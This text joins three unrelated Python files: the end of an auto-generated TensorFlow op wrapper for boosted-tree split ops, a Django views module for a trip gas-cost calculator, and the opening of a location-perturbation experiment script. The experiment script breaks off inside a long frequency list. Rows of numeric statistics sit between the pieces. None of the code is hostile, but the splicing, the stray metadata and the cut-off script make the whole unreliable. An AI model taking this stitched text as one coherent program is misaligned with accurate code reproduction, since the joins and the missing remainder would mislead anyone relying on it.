              "multiclass_strategy", _op.get_attr("multiclass_strategy"))
  else:
    # Eager mode: convert each input to a tensor of the dtype declared in
    # the op def, then execute the kernel directly (3 = number of outputs).
    num_minibatches = _ops.convert_to_tensor(num_minibatches, _dtypes.int64)
    partition_ids = _ops.convert_to_tensor(partition_ids, _dtypes.int32)
    bucket_ids = _ops.convert_to_tensor(bucket_ids, _dtypes.int64)
    gradients = _ops.convert_to_tensor(gradients, _dtypes.float32)
    hessians = _ops.convert_to_tensor(hessians, _dtypes.float32)
    bucket_boundaries = _ops.convert_to_tensor(bucket_boundaries, _dtypes.float32)
    class_id = _ops.convert_to_tensor(class_id, _dtypes.int32)
    _inputs_flat = [num_minibatches, partition_ids, bucket_ids, gradients, hessians, bucket_boundaries, class_id]
    _attrs = ("feature_column_group_id", feature_column_group_id,
              "bias_feature_id", bias_feature_id, "l1_regularization",
              l1_regularization, "l2_regularization", l2_regularization,
              "tree_complexity_regularization",
              tree_complexity_regularization, "min_node_weight",
              min_node_weight, "multiclass_strategy", multiclass_strategy)
    _result = _execute.execute(b"BuildSparseInequalitySplits", 3,
                               inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
                               name=name)
  # Register the op invocation so gradients can be computed later.
  _execute.record_gradient(
      "BuildSparseInequalitySplits", _inputs_flat, _attrs, _result, name)
  # Wrap the flat output list in the named output tuple.
  _result = _BuildSparseInequalitySplitsOutput._make(_result)
  return _result
def _InitOpDefLibrary(op_list_proto_bytes):
  """Deserialize an `OpList` proto, register its ops, and return a library.

  Args:
    op_list_proto_bytes: serialized `OpList` protocol buffer bytes.

  Returns:
    An `OpDefLibrary` populated with every op in the proto.
  """
  parsed_op_list = _op_def_pb2.OpList()
  parsed_op_list.ParseFromString(op_list_proto_bytes)
  # Make the ops known to the global registry before exposing the library.
  _op_def_registry.register_op_list(parsed_op_list)
  library = _op_def_library.OpDefLibrary()
  library.add_op_list(parsed_op_list)
  return library
# op {
# name: "BuildCategoricalEqualitySplits"
# input_arg {
# name: "num_minibatches"
# type: DT_INT64
# }
# input_arg {
# name: "partition_ids"
# type: DT_INT32
# }
# input_arg {
# name: "feature_ids"
# type: DT_INT64
# }
# input_arg {
# name: "gradients"
# type: DT_FLOAT
# }
# input_arg {
# name: "hessians"
# type: DT_FLOAT
# }
# input_arg {
# name: "class_id"
# type: DT_INT32
# }
# output_arg {
# name: "output_partition_ids"
# type: DT_INT32
# }
# output_arg {
# name: "gains"
# type: DT_FLOAT
# }
# output_arg {
# name: "split_infos"
# type: DT_STRING
# }
# attr {
# name: "feature_column_group_id"
# type: "int"
# }
# attr {
# name: "bias_feature_id"
# type: "int"
# }
# attr {
# name: "l1_regularization"
# type: "float"
# }
# attr {
# name: "l2_regularization"
# type: "float"
# }
# attr {
# name: "tree_complexity_regularization"
# type: "float"
# }
# attr {
# name: "min_node_weight"
# type: "float"
# }
# attr {
# name: "multiclass_strategy"
# type: "int"
# }
# }
# op {
# name: "BuildDenseInequalitySplits"
# input_arg {
# name: "num_minibatches"
# type: DT_INT64
# }
# input_arg {
# name: "partition_ids"
# type: DT_INT32
# }
# input_arg {
# name: "bucket_ids"
# type: DT_INT64
# }
# input_arg {
# name: "gradients"
# type: DT_FLOAT
# }
# input_arg {
# name: "hessians"
# type: DT_FLOAT
# }
# input_arg {
# name: "bucket_boundaries"
# type: DT_FLOAT
# }
# input_arg {
# name: "class_id"
# type: DT_INT32
# }
# output_arg {
# name: "output_partition_ids"
# type: DT_INT32
# }
# output_arg {
# name: "gains"
# type: DT_FLOAT
# }
# output_arg {
# name: "split_infos"
# type: DT_STRING
# }
# attr {
# name: "feature_column_group_id"
# type: "int"
# }
# attr {
# name: "l1_regularization"
# type: "float"
# }
# attr {
# name: "l2_regularization"
# type: "float"
# }
# attr {
# name: "tree_complexity_regularization"
# type: "float"
# }
# attr {
# name: "min_node_weight"
# type: "float"
# }
# attr {
# name: "multiclass_strategy"
# type: "int"
# }
# }
# op {
# name: "BuildSparseInequalitySplits"
# input_arg {
# name: "num_minibatches"
# type: DT_INT64
# }
# input_arg {
# name: "partition_ids"
# type: DT_INT32
# }
# input_arg {
# name: "bucket_ids"
# type: DT_INT64
# }
# input_arg {
# name: "gradients"
# type: DT_FLOAT
# }
# input_arg {
# name: "hessians"
# type: DT_FLOAT
# }
# input_arg {
# name: "bucket_boundaries"
# type: DT_FLOAT
# }
# input_arg {
# name: "class_id"
# type: DT_INT32
# }
# output_arg {
# name: "output_partition_ids"
# type: DT_INT32
# }
# output_arg {
# name: "gains"
# type: DT_FLOAT
# }
# output_arg {
# name: "split_infos"
# type: DT_STRING
# }
# attr {
# name: "feature_column_group_id"
# type: "int"
# }
# attr {
# name: "bias_feature_id"
# type: "int"
# }
# attr {
# name: "l1_regularization"
# type: "float"
# }
# attr {
# name: "l2_regularization"
# type: "float"
# }
# attr {
# name: "tree_complexity_regularization"
# type: "float"
# }
# attr {
# name: "min_node_weight"
# type: "float"
# }
# attr {
# name: "multiclass_strategy"
# type: "int"
# }
# }
_op_def_lib = _InitOpDefLibrary(b"\n\211\003\n\036BuildCategoricalEqualitySplits\022\023\n\017num_minibatches\030\t\022\021\n\rpartition_ids\030\003\022\017\n\013feature_ids\030\t\022\r\n\tgradients\030\001\022\014\n\010hessians\030\001\022\014\n\010class_id\030\003\032\030\n\024output_partition_ids\030\003\032\t\n\005gains\030\001\032\017\n\013split_infos\030\007\"\036\n\027feature_column_group_id\022\003int\"\026\n\017bias_feature_id\022\003int\"\032\n\021l1_regularization\022\005float\"\032\n\021l2_regularization\022\005float\"\'\n\036tree_complexity_regularization\022\005float\"\030\n\017min_node_weight\022\005float\"\032\n\023multiclass_strategy\022\003int\n\203\003\n\032BuildDenseInequalitySplits\022\023\n\017num_minibatches\030\t\022\021\n\rpartition_ids\030\003\022\016\n\nbucket_ids\030\t\022\r\n\tgradients\030\001\022\014\n\010hessians\030\001\022\025\n\021bucket_boundaries\030\001\022\014\n\010class_id\030\003\032\030\n\024output_partition_ids\030\003\032\t\n\005gains\030\001\032\017\n\013split_infos\030\007\"\036\n\027feature_column_group_id\022\003int\"\032\n\021l1_regularization\022\005float\"\032\n\021l2_regularization\022\005float\"\'\n\036tree_complexity_regularization\022\005float\"\030\n\017min_node_weight\022\005float\"\032\n\023multiclass_strategy\022\003int\n\234\003\n\033BuildSparseInequalitySplits\022\023\n\017num_minibatches\030\t\022\021\n\rpartition_ids\030\003\022\016\n\nbucket_ids\030\t\022\r\n\tgradients\030\001\022\014\n\010hessians\030\001\022\025\n\021bucket_boundaries\030\001\022\014\n\010class_id\030\003\032\030\n\024output_partition_ids\030\003\032\t\n\005gains\030\001\032\017\n\013split_infos\030\007\"\036\n\027feature_column_group_id\022\003int\"\026\n\017bias_feature_id\022\003int\"\032\n\021l1_regularization\022\005float\"\032\n\021l2_regularization\022\005float\"\'\n\036tree_complexity_regularization\022\005float\"\030\n\017min_node_weight\022\005float\"\032\n\023multiclass_strategy\022\003int")
| 43.669941
| 1,968
| 0.716619
| 2,797
| 22,228
| 5.315338
| 0.07508
| 0.036322
| 0.034102
| 0.048429
| 0.902132
| 0.865676
| 0.85942
| 0.854039
| 0.847447
| 0.839914
| 0
| 0.047519
| 0.183912
| 22,228
| 508
| 1,969
| 43.755906
| 0.772051
| 0.336018
| 0
| 0.713542
| 1
| 0.010417
| 0.227466
| 0.154799
| 0
| 0
| 0
| 0
| 0
| 1
| 0.020833
| false
| 0
| 0.057292
| 0
| 0.098958
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
d5eb735a01ea9b0c9c860412faeaf0d2690955b4
| 9,407
|
py
|
Python
|
costcalculator/views.py
|
connor-c/Trip-Gas-Cost-Calculator
|
6101093ffd48b6cb6c4f847b8c1f40351617750b
|
[
"MIT"
] | null | null | null |
costcalculator/views.py
|
connor-c/Trip-Gas-Cost-Calculator
|
6101093ffd48b6cb6c4f847b8c1f40351617750b
|
[
"MIT"
] | 8
|
2020-02-11T23:59:35.000Z
|
2022-02-10T07:16:43.000Z
|
costcalculator/views.py
|
connor-c/Trip-Gas-Cost-Calculator
|
6101093ffd48b6cb6c4f847b8c1f40351617750b
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render, redirect
from costcalculator.forms import *
from .distance import get_distance
def index(request):
    """Render the address-based trip-cost form page.

    GET: show forms bound to any query parameters, with ``num_people``
    defaulting to 1.  Valid POST: store the cleaned values in the session
    under ``'completed_forms'`` and redirect to the results page.
    Invalid POST: replace only the invalid forms so valid entries are kept.

    The original duplicated the render/context block in both the invalid-POST
    and GET paths; this version has a single render path.
    """
    if request.method == 'POST':
        origin = OriginForm(request.POST)
        destination = DestinationForm(request.POST)
        gas_price = GasPriceForm(request.POST)
        mpg = MpgForm(request.POST)
        num_people = NumPeopleForm(request.POST)
        if (origin.is_valid() and destination.is_valid()
                and gas_price.is_valid() and mpg.is_valid()
                and num_people.is_valid()):
            request.session['completed_forms'] = {
                'origin': origin.cleaned_data['origin_address'],
                'destination': destination.cleaned_data['destination_address'],
                'gas_price': gas_price.cleaned_data['gas_price'],
                'mpg': mpg.cleaned_data['mpg'],
                'num_people': num_people.cleaned_data['num_people'],
            }
            return redirect('calculated_addresses/')
        # Replace only the forms that failed validation; valid forms keep
        # their POSTed values.
        if not origin.is_valid():
            origin = OriginForm(request.GET)
        if not destination.is_valid():
            destination = DestinationForm(request.GET)
        if not gas_price.is_valid():
            gas_price = GasPriceForm(request.GET)
        if not mpg.is_valid():
            mpg = MpgForm(request.GET)
        if not num_people.is_valid():
            num_people = NumPeopleForm(initial={'num_people': 1})
    else:
        origin = OriginForm(request.GET)
        destination = DestinationForm(request.GET)
        gas_price = GasPriceForm(request.GET)
        mpg = MpgForm(request.GET)
        num_people = NumPeopleForm(initial={'num_people': 1})
    # Single shared render path for GET and invalid POST.
    return render(request, 'costcalculator/index.html', {
        'origin': origin,
        'destination': destination,
        'gas_price': gas_price,
        'mpg': mpg,
        'num_people': num_people,
    })
def calculated(request):
    """Show the computed trip cost for the address-based flow.

    Reads the submitted (or previously session-stored) values, looks up the
    driving distance via ``get_distance``, and renders the cost breakdown.

    Fixes two crashes in the original:
    * ``trip_cost``/``cost_per_person`` were only assigned in the ``except``
      branch, so a ``None`` return from ``get_distance`` raised ``NameError``
      at render time — they now default to the error message.
    * A direct GET with no session data left ``completed_forms`` as ``None``
      and raised ``TypeError`` — it now defaults to an empty dict and the
      form prefills use ``.get`` with safe defaults.
    """
    completed_forms = request.session.get('completed_forms') or {}
    if request.method == 'POST':
        origin = OriginForm(request.POST)
        destination = DestinationForm(request.POST)
        gas_price = GasPriceForm(request.POST)
        mpg = MpgForm(request.POST)
        num_people = NumPeopleForm(request.POST)
        if (origin.is_valid() and destination.is_valid()
                and gas_price.is_valid() and mpg.is_valid()
                and num_people.is_valid()):
            completed_forms = {
                'origin': origin.cleaned_data['origin_address'],
                'destination': destination.cleaned_data['destination_address'],
                'gas_price': gas_price.cleaned_data['gas_price'],
                'mpg': mpg.cleaned_data['mpg'],
                'num_people': num_people.cleaned_data['num_people'],
            }
            request.session['completed_forms'] = completed_forms
    # Pre-initialize so every render path has values even when the distance
    # lookup fails or the session data is missing.
    error_message = 'Distance Calculation Error, Please Try Again.'
    trip_cost = error_message
    cost_per_person = error_message
    try:
        distance = get_distance(completed_forms['origin'],
                                completed_forms['destination'])
    except KeyError:
        distance = None
    if distance is not None:
        # 'mpg', 'gas_price' and 'num_people' are always stored together
        # with 'origin' in the valid-POST path, so they are present here.
        trip_cost = round((distance / completed_forms['mpg'])
                          * completed_forms['gas_price'], 2)
        cost_per_person = '$' + str(round(trip_cost / completed_forms['num_people'], 2))
        distance = str(round(distance, 1)) + ' miles'
        trip_cost = '$' + str(trip_cost)
    else:
        distance = error_message
    origin = OriginForm(initial={'origin_address': completed_forms.get('origin', '')})
    destination = DestinationForm(initial={'destination_address': completed_forms.get('destination', '')})
    gas_price = GasPriceForm(initial={'gas_price': completed_forms.get('gas_price', '')})
    mpg = MpgForm(initial={'mpg': completed_forms.get('mpg', '')})
    num_people = NumPeopleForm(initial={'num_people': completed_forms.get('num_people', 1)})
    return render(request, 'costcalculator/calculated_addresses.html', {
        'origin': origin,
        'destination': destination,
        'gas_price': gas_price,
        'mpg': mpg,
        'num_people': num_people,
        'distance': distance,
        'trip_cost': trip_cost,
        'cost_per_person': cost_per_person,
    })
def use_distance(request):
    """Render the manual-distance trip-cost form page.

    GET: show forms bound to any query parameters, with ``num_people``
    defaulting to 1.  Valid POST: store the cleaned values in the session
    under ``'completed_forms'`` and redirect to the results page.
    Invalid POST: replace only the invalid forms so valid entries are kept.

    The original duplicated the render/context block in both the invalid-POST
    and GET paths; this version has a single render path.
    """
    if request.method == 'POST':
        distance = DistanceForm(request.POST)
        gas_price = GasPriceForm(request.POST)
        mpg = MpgForm(request.POST)
        num_people = NumPeopleForm(request.POST)
        if (distance.is_valid() and gas_price.is_valid()
                and mpg.is_valid() and num_people.is_valid()):
            request.session['completed_forms'] = {
                'distance': distance.cleaned_data['distance'],
                'gas_price': gas_price.cleaned_data['gas_price'],
                'mpg': mpg.cleaned_data['mpg'],
                'num_people': num_people.cleaned_data['num_people'],
            }
            return redirect('../calculated_distance/')
        # Replace only the forms that failed validation; valid forms keep
        # their POSTed values.
        if not distance.is_valid():
            distance = DistanceForm(request.GET)
        if not gas_price.is_valid():
            gas_price = GasPriceForm(request.GET)
        if not mpg.is_valid():
            mpg = MpgForm(request.GET)
        if not num_people.is_valid():
            num_people = NumPeopleForm(initial={'num_people': 1})
    else:
        distance = DistanceForm(request.GET)
        gas_price = GasPriceForm(request.GET)
        mpg = MpgForm(request.GET)
        num_people = NumPeopleForm(initial={'num_people': 1})
    # Single shared render path for GET and invalid POST.
    return render(request, 'costcalculator/use_distance.html', {
        'distance': distance,
        'gas_price': gas_price,
        'mpg': mpg,
        'num_people': num_people,
    })
def calculated_distance(request):
    """Show the computed trip cost for the manual-distance flow.

    Uses the values stored in the session (refreshed by a valid POST) to
    compute total cost and cost per person from a user-supplied distance.
    """
    completed_forms = request.session.get('completed_forms')
    if request.method == 'POST':
        distance_form = DistanceForm(request.POST)
        gas_price_form = GasPriceForm(request.POST)
        mpg_form = MpgForm(request.POST)
        num_people_form = NumPeopleForm(request.POST)
        forms_valid = (distance_form.is_valid() and gas_price_form.is_valid()
                       and mpg_form.is_valid() and num_people_form.is_valid())
        if forms_valid:
            completed_forms = {
                'distance': distance_form.cleaned_data['distance'],
                'gas_price': gas_price_form.cleaned_data['gas_price'],
                'mpg': mpg_form.cleaned_data['mpg'],
                'num_people': num_people_form.cleaned_data['num_people'],
            }
            request.session['completed_forms'] = completed_forms
    # Cost = (distance / mpg) * price-per-gallon, rounded to cents.
    cost = round((completed_forms['distance'] / completed_forms['mpg'])
                 * completed_forms['gas_price'], 2)
    cost_per_person = '$' + str(round(cost / completed_forms['num_people'], 2))
    # Renamed from the original local 'calculated_distance', which shadowed
    # this function's own name.
    distance_label = str(round(completed_forms['distance'], 1)) + ' miles'
    trip_cost = '$' + str(cost)
    distance = DistanceForm(initial={'distance': completed_forms['distance']})
    gas_price = GasPriceForm(initial={'gas_price': completed_forms['gas_price']})
    mpg = MpgForm(initial={'mpg': completed_forms['mpg']})
    num_people = NumPeopleForm(initial={'num_people': completed_forms['num_people']})
    context = {
        'gas_price': gas_price,
        'mpg': mpg,
        'num_people': num_people,
        'distance': distance,
        'calculated_distance': distance_label,
        'trip_cost': trip_cost,
        'cost_per_person': cost_per_person,
    }
    return render(request, 'costcalculator/calculated_distance.html', context)
| 52.553073
| 126
| 0.524928
| 854
| 9,407
| 5.526932
| 0.0726
| 0.095339
| 0.029661
| 0.033898
| 0.822881
| 0.819915
| 0.795763
| 0.795763
| 0.78178
| 0.78178
| 0
| 0.001695
| 0.372914
| 9,407
| 178
| 127
| 52.848315
| 0.79844
| 0
| 0
| 0.771812
| 0
| 0
| 0.144042
| 0.025194
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026846
| false
| 0
| 0.020134
| 0
| 0.100671
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9134ea1591aaa49ad44f171a6aa4e29f6c124f0c
| 41,836
|
py
|
Python
|
experiment_1_5(Geolife_pert_2).py
|
MeetSiddhartha/spatialPatternLocationPert
|
96d3afbdeb9630ccdb9bddc199d9bcaceaf42b61
|
[
"Apache-2.0"
] | 4
|
2020-09-14T13:36:58.000Z
|
2022-02-20T12:29:35.000Z
|
experiment_1_5(Geolife_pert_2).py
|
MeetSiddhartha/spatialPatternLocationPert
|
96d3afbdeb9630ccdb9bddc199d9bcaceaf42b61
|
[
"Apache-2.0"
] | 1
|
2021-05-21T02:25:34.000Z
|
2021-05-21T02:26:05.000Z
|
experiment_1_5(Geolife_pert_2).py
|
MeetSiddhartha/spatialPatternLocationPert
|
96d3afbdeb9630ccdb9bddc199d9bcaceaf42b61
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import time
import matplotlib.pyplot as plt
import seaborn as sns
import random
import perturbation_tool
from scipy.stats import wasserstein_distance
def main ():
JS_multiTimes_Laplace = []
JS_multiTimes_distPreserving = []
dimension = 100
round_number = 2
for round_count in range(round_number):
print("第几轮了:",round_count)
JS_Laplace = []
JS_distPreserving = []
np.random.seed(int(time.time()))
proportion_list = [10,15,20,25,30,35,40,45,50,55,60,65,70,75,80,85,90,95,100]
for proportion in proportion_list:
print('proportion:', proportion,'%')
frequency_1 = [0, 0, 0, 0, 0, 0, 0, 0, 3, 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 414, 0, 0, 0, 0, 0, 0, 4, 2, 0, 0, 0, 0, 0, 0, 0, 0, 4, 12, 0, 0, 0, 0, 0, 0, 0, 0, 0, 166, 0, 0, 0, 0, 372, 0, 0, 0, 0, 0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 19, 21, 0, 77, 22, 1, 62, 0, 0, 100, 56, 30, 117, 33, 3, 4, 0, 0, 0, 104, 0, 0, 0, 0, 28, 30, 14, 0, 0, 0, 0, 0, 0, 0, 2, 14, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 281, 159, 0, 0, 0, 0, 0, 0, 3, 5, 2, 4, 4, 1, 0, 0, 0, 5, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 97, 0, 0, 0, 396, 205, 0, 0, 0, 0, 1, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 12, 24, 49, 68, 21, 0, 36, 54, 44, 173, 27, 0, 22, 0, 0, 0, 4, 2, 0, 0, 0, 0, 0, 0, 0, 0, 15, 29, 0, 0, 0, 0, 0, 0, 0, 6, 13, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 403, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 3, 2, 0, 0, 2, 4, 0, 0, 0, 0, 0, 0, 0, 0, 65, 93, 0, 228, 538, 93, 0, 0, 0, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 6, 34, 11, 0, 6, 0, 0, 0, 0, 25, 0, 1, 28, 22, 32, 23, 0, 2, 3, 0, 0, 0, 0, 0, 0, 0, 0, 2, 30, 13, 0, 0, 0, 0, 0, 0, 9, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 109, 295, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 2, 0, 0, 5, 0, 0, 0, 0, 0, 2, 0, 59, 15, 0, 53, 505, 9, 38, 26, 0, 2, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 10, 0, 32, 0, 0, 32, 15, 9, 5, 8, 26, 13, 18, 38, 5, 0, 9, 47, 29, 99, 5, 0, 0, 24, 37, 0, 0, 0, 0, 0, 16, 26, 15, 0, 0, 0, 0, 0, 11, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 409, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 4, 4, 11, 0, 0, 0, 0, 1, 0, 11, 80, 0, 10, 615, 0, 0, 10, 80, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 10, 0, 10, 0, 4, 18, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 229, 287, 55, 43, 23, 2, 0, 0, 0, 0, 0, 0, 0, 12, 27, 21, 0, 0, 0, 0, 11, 8, 0, 0, 0, 0, 0, 0, 0, 182, 426, 327, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 4, 4, 1, 0, 0, 74, 0, 0, 438, 8, 0, 0, 0, 111, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 8, 0, 12, 1, 0, 14, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 143, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 30, 11, 0, 0, 0, 8, 
13, 0, 0, 0, 0, 0, 0, 405, 1837, 696, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 1, 0, 54, 0, 654, 223, 0, 0, 0, 0, 79, 11, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 12, 0, 0, 18, 0, 0, 14, 0, 0, 0, 0, 35, 50, 46, 41, 66, 54, 53, 62, 65, 98, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 18, 30, 1, 0, 0, 2, 29, 5, 0, 0, 0, 0, 0, 0, 676, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 4, 433, 652, 115, 4, 4, 4, 4, 4, 1, 114, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 11, 0, 0, 24, 0, 0, 117, 36, 47, 86, 36, 4, 0, 0, 0, 0, 1, 0, 0, 39, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 29, 21, 0, 5, 14, 27, 0, 0, 0, 0, 0, 334, 145, 34, 32, 32, 32, 32, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 38, 4, 3, 4, 591, 62, 18, 1, 0, 0, 0, 0, 0, 44, 74, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 6, 6, 0, 16, 23, 0, 0, 55, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 38, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 10, 32, 18, 0, 0, 21, 0, 0, 0, 0, 320, 46, 0, 0, 0, 0, 1, 25, 35, 40, 5, 0, 8, 38, 31, 34, 30, 2, 5, 445, 8, 0, 41, 0, 2, 738, 25, 0, 26, 20, 18, 0, 83, 128, 175, 120, 1393, 125, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 12, 0, 18, 5, 0, 0, 0, 46, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 26, 33, 2, 18, 0, 0, 0, 121, 280, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 19, 28, 0, 0, 12, 0, 37, 127, 319, 0, 0, 22, 0, 1, 711, 594, 24, 0, 0, 137, 250, 107, 0, 0, 64, 224, 100, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 12, 0, 14, 2, 0, 0, 0, 46, 2, 0, 0, 0, 76, 131, 0, 0, 0, 0, 1, 30, 17, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 6, 0, 0, 33, 43, 0, 0, 0, 30, 589, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 13, 0, 4, 518, 0, 0, 0, 28, 0, 1, 751, 26, 316, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 5, 4, 15, 4, 0, 0, 0, 97, 35, 6, 33, 40, 1, 68, 0, 0, 0, 0, 0, 38, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 0, 0, 0, 15, 51, 32, 34, 
20, 501, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 12, 0, 34, 387, 0, 0, 30, 970, 0, 10, 495, 0, 1, 0, 0, 0, 50, 0, 0, 0, 0, 2, 5, 1, 0, 0, 0, 0, 0, 2, 0, 0, 0, 14, 0, 11, 0, 1, 2, 3, 1, 89, 0, 25, 4, 0, 0, 35, 652, 165, 0, 0, 0, 161, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 6, 0, 0, 0, 0, 9, 20, 20, 11, 210, 327, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 11, 0, 33, 337, 0, 0, 0, 142, 0, 0, 750, 185, 184, 72, 54, 0, 2, 0, 0, 0, 0, 1, 0, 2, 0, 0, 0, 3, 2, 3, 0, 0, 0, 14, 0, 15, 16, 0, 0, 0, 0, 72, 0, 0, 0, 0, 0, 0, 0, 308, 0, 0, 0, 997, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 9, 0, 0, 0, 0, 0, 0, 0, 8, 21, 741, 42, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 10, 0, 27, 340, 0, 0, 34, 204, 26, 35, 516, 0, 76, 0, 182, 0, 17, 0, 0, 0, 0, 1, 2, 7, 328, 3119, 7076, 0, 572, 468, 778, 586, 787, 3, 0, 13, 4, 0, 0, 0, 0, 72, 0, 0, 0, 0, 0, 0, 0, 298, 0, 0, 1, 43, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 9, 0, 0, 0, 0, 0, 0, 0, 8, 17, 10, 344, 336, 330, 327, 344, 487, 342, 0, 0, 0, 0, 34, 45, 52, 44, 46, 281, 480, 362, 391, 619, 328, 384, 796, 170, 197, 173, 298, 13, 5, 0, 0, 2, 2, 797, 459, 387, 433, 1329, 1194, 954, 945, 811, 202, 0, 327, 184, 164, 320, 0, 0, 0, 0, 0, 82, 0, 0, 0, 0, 0, 0, 218, 290, 1, 1, 0, 44, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 6, 0, 3, 9, 9, 3, 0, 12, 6, 0, 0, 0, 0, 0, 0, 0, 0, 274, 0, 0, 25, 45, 13, 0, 11, 0, 0, 2, 411, 1028, 288, 329, 8, 8, 422, 3, 32, 0, 5, 256, 262, 289, 189, 44, 2, 365, 6, 12, 1, 312, 264, 82, 0, 0, 7, 0, 13, 14, 0, 155, 0, 0, 0, 0, 0, 93, 0, 25, 37, 31, 37, 34, 143, 0, 0, 0, 1, 79, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 179, 35, 8, 7, 0, 0, 5, 7, 1, 0, 2, 0, 0, 0, 0, 0, 0, 0, 296, 45, 47, 20, 0, 0, 0, 10, 0, 0, 7, 224, 158, 219, 170, 0, 1, 387, 11, 33, 0, 0, 0, 0, 103, 0, 135, 163, 526, 168, 161, 210, 775, 0, 0, 0, 0, 11, 13, 1, 0, 0, 184, 0, 0, 0, 0, 0, 231, 37, 9, 0, 0, 0, 0, 0, 0, 0, 0, 40, 0, 0, 0, 0, 0, 0, 0, 
